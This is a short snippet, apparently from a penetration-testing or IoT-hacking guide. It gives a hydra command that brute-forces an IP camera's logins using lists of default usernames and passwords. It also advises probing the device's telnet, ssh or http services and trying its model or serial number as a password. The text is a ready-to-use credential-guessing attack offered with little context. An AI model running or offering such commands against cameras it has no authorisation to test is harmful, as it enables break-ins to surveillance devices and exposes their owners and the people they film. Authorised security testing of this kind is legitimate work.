hydra -e nsr -L cameras_default_logins.txt -P cameras_default_passwords.txt <CAMERA_IP> <PROTOCOL>Up to you to do your own research depending of the protocols available on the device (telnet, ssh, http...). Also try model, serial number of camera if available.
